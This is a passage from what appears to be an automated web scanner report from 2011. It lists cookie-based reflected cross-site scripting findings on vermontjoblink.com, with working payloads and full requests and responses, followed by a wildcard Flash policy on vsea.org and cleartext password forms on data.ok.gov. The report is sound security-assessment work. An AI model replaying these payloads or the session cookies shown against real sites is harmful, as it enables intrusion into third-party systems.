<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="end3d5b"><img src=a onerror=alert(1)>18601d5f451">
...[SNIP]...

3.245. https://www.vermontjoblink.com/ada/works/linkview.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/linkview.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0e85"><img%20src%3da%20onerror%3dalert(1)>5e8abc94283 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as c0e85"><img src=a onerror=alert(1)>5e8abc94283 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/linkview.cfm?set=JSR HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enc0e85"><img%20src%3da%20onerror%3dalert(1)>5e8abc94283; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enc0e85"><img src=a onerror=alert(1)>5e8abc94283">
...[SNIP]...

3.246. https://www.vermontjoblink.com/ada/works/linkview.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/linkview.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd58c"%3balert(1)//1a305bee659 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as cd58c";alert(1)//1a305bee659 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/linkview.cfm?set=JSR HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=encd58c"%3balert(1)//1a305bee659; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENCD58C";ALERT(1)//1A305BEE659\">
...[SNIP]...

3.247. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/resourcesoverview.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e61"><img%20src%3da%20onerror%3dalert(1)>6a2d11c994c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 14e61"><img src=a onerror=alert(1)>6a2d11c994c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en14e61"><img%20src%3da%20onerror%3dalert(1)>6a2d11c994c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en14e61"><img src=a onerror=alert(1)>6a2d11c994c">
...[SNIP]...

3.248. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/resourcesoverview.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 547b0"%3balert(1)//a5d8ef8c477 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 547b0";alert(1)//a5d8ef8c477 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en547b0"%3balert(1)//a5d8ef8c477; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN547B0";ALERT(1)//A5D8EF8C477\">
...[SNIP]...

3.249. https://www.vermontjoblink.com/favicon.ico [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /favicon.ico

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53fa7"><img%20src%3da%20onerror%3dalert(1)>6f76395c81f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 53fa7"><img src=a onerror=alert(1)>6f76395c81f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en53fa7"><img%20src%3da%20onerror%3dalert(1)>6f76395c81f; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:28:25 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en53fa7"><img src=a onerror=alert(1)>6f76395c81f">
...[SNIP]...

3.250. https://www.vermontjoblink.com/favicon.ico [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /favicon.ico

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c6ff"%3balert(1)//cac32dd0109 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 8c6ff";alert(1)//cac32dd0109 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en8c6ff"%3balert(1)//cac32dd0109; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:28:27 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN8C6FF";ALERT(1)//CAC32DD0109\">
...[SNIP]...

4. Flash cross-domain policy  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vsea.org

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:12:52 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Tue, 18 Nov 2008 21:21:25 GMT
ETag: "1dcc26-6d-45bfd47205f40"
Accept-Ranges: bytes
Content-Length: 109
Cache-Control: max-age=1209600
Expires: Fri, 13 May 2011 22:12:52 GMT
Vary: User-Agent
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

5. Cleartext submission of password  previous  next
There are 16 instances of this issue:


5.1. http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.1.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:45 GMT
Server: Apache
ETag: "11bf9c3a3a6c0c1333373cbfb6d9afff"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 85997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if lte IE 7]>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
</div>

<form action="/user_sessions" class="commonForm" id="new_user_session" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input autocomplete="off" id="user_session_password" name="user_session[password]" size="30" type="password" />
</div>
...[SNIP]...

5.2. http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.1.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:45 GMT
Server: Apache
ETag: "11bf9c3a3a6c0c1333373cbfb6d9afff"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 85997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if lte IE 7]>
